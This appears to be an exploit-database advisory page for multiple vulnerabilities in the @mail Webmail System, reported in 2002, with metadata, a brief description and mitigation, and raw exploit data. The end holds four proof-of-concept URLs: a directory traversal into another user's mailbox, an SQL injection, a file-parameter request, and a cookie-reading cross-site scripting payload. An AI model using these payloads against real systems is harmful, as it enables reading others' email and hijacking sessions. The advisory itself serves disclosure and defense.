@mail Webmail System Multiple Vulnerabilities

vendor:

Webmail System

by:

SecurityFocus

8.3

CVSS

HIGH

Directory Traversal, SQL Injection, Session Hijacking, and Cross-Site Scripting

89, 79, 352, 79

CWE

Product Name: Webmail System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

@mail Webmail System Multiple Vulnerabilities

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

Mitigation:

Ensure that all user input is validated and filtered before being used in web application logic. Ensure that all web applications are kept up to date with the latest security patches.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9180/info

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

http://www.example.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1

http://www.example.com/parse.pl?file=html/english/xp/xplogin.html

http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>